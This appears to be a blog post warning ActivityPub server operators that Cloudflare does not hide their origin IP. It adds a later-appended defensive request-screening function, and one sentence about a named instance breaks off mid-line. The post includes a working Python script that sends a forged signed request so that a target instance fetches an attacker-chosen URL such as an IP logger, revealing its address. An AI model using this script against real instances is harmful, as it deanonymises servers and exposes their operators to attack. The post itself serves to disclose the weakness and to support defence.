Stop Using Cloudflare with ActivityPub

How 7 proxies can't help much when you don't know what you're doing

The seven proxies meme but he's frowning. The text has been replaced with WHY IS UNDER ATTACK MODE CAUSING MY SERVER TO BREAK WTF.

So, presume you have a VPN. You use this VPN to go around posting on piracy forums and such and keeping up with the latest leaks. Suddenly, one day, you get a cease and desist. But you had a VPN! What happened?

Well, what you didn't realize is that BitTorrent is a decentralized protocol where your client sends the IP to a tracker that lets people know where to send the data. (It's more complex than that, but just work with me here.)
The issue is your client didn't know you were behind a VPN and dutifully sent your home IP while you were getting that fresh leaked copy of Shrek 2, meaning people watching the torrent could see your IP too.

Thankfully, VPNs are for sending requests too, so this is an easy-to-solve problem!


ActivityPub is a decentralized protocol that runs on a server and makes external requests.
Cloudflare is a protection service that assumes you will not be making external requests and only will be replying to requests.

Please, stop trying to combine them. As part of my plea, here's proof that this doesn't work and you should stop.

import requests
import argparse

parser = argparse.ArgumentParser(description='Cause a GET request from an ActivityPub-compatible instance.')
parser.add_argument('instance', help="Hostname of the instance.")
parser.add_argument('url', help="URL to request.")
parser.add_argument('-d', '--debug', action='store_true', help="Enable debug output")
args = parser.parse_args()
if args.debug:
  # bunch of bullshit to enable requests logging
  import logging
  import http.client as http_client
  http_client.HTTPConnection.debuglevel = 1
  logging.basicConfig(level=logging.DEBUG)
  requests_log = logging.getLogger("requests.packages.urllib3")
  requests_log.setLevel(logging.DEBUG)
  requests_log.propagate = True
# build the inbox URL, adding a scheme if the instance was given as a bare hostname
if '://' not in args.instance:
  inbox = f"https://{args.instance}/inbox"
else:
  inbox = f"{args.instance}/inbox"
# the URL goes into keyId, which the instance fetches to look up the signing key
header = 'keyId="%s",headers="(request-target) host",signature="aA=="' % (args.url)

p = requests.post(inbox, data = "{}", headers = {"Signature": header, "User-Agent": "http.rb/3.3.0 ()"})
if "Public key not found" in p.text:
  print("[!] (Public key not found usually means it worked, check your logs)")
elif p.status_code == 500:
  print("[!] (500 occurred, if Pleroma, check logs!)")
else:
  print("[?] Not sure what this is, but check logs anyway lol")

This script will automatically pass a lousy, really effortless request to an instance that makes it dutifully request whatever you ask of it. Including IP loggers, which are a dime a dozen, meaning I can get your instance's IP anyway. For example, Spinster is at
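
A defender-side check for the request the script above sends, as an added example that is not part of the original post: before the server fetches the keyId URL, screen the Signature header and body and log whatever fails. The function name, MIN_SIG_BYTES and the sample hosts are assumptions made for illustration.

```python
import base64
import binascii
import json
import re
from urllib.parse import urlsplit

# name="value" parameters of a draft-cavage style Signature header
PARAM_RE = re.compile(r'(\w+)="([^"]*)"')
MIN_SIG_BYTES = 128  # assumption: RSA-1024 or larger (2048-bit keys give 256 bytes)


def prefetch_findings(signature_header, body):
    """List the reasons an inbox POST should be logged and dropped
    before the keyId URL is fetched. An empty list means proceed."""
    findings = []
    params = dict(PARAM_RE.findall(signature_header or ""))
    key_url = urlsplit(params.get("keyId", ""))
    if key_url.scheme != "https" or not key_url.hostname:
        findings.append("keyId is not an https URL")
    try:
        sig = base64.b64decode(params.get("signature", ""), validate=True)
    except (binascii.Error, ValueError):
        sig = b""
    if len(sig) < MIN_SIG_BYTES:
        findings.append("signature too short to be an RSA signature")
    try:
        activity = json.loads(body)
    except ValueError:
        activity = None
    actor = activity.get("actor") if isinstance(activity, dict) else None
    if isinstance(actor, dict):  # actor may be embedded as an object
        actor = actor.get("id")
    if not isinstance(actor, str):
        findings.append("body has no actor")
    elif urlsplit(actor).hostname != key_url.hostname:
        findings.append("actor host differs from keyId host")
    return findings


# Constructed samples: PROBE mirrors the header and body the script above sends.
PROBE = ('keyId="https://logger.example/x",headers="(request-target) host",signature="aA=="', "{}")
PLAUSIBLE = ('keyId="https://peer.example/users/a#main-key",headers="(request-target) host date digest",'
             'signature="%s"' % base64.b64encode(bytes(256)).decode(),
             json.dumps({"type": "Follow", "actor": "https://peer.example/users/a"}))

if __name__ == "__main__":
    for name, (header, body) in (("probe", PROBE), ("plausible", PLAUSIBLE)):
        print(name, prefetch_findings(header, body) or "ok to fetch key")
```

This screens only the request shape shown above and gives an operator something to alert on. A server that fetches keys directly still contacts remote hosts from its own address for every legitimate key lookup.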

Now that I have sufficiently proven that any reverse proxy without an actual proxy is useless, what can you do about it?

Don't use Cloudflare

Seriously, Cloudflare blocks automated requests.
The way ActivityPub works is automated requests.

Please stop using Cloudflare. If you want an anti-DDoS solution, get an anti-DDoS server host.

Thank you.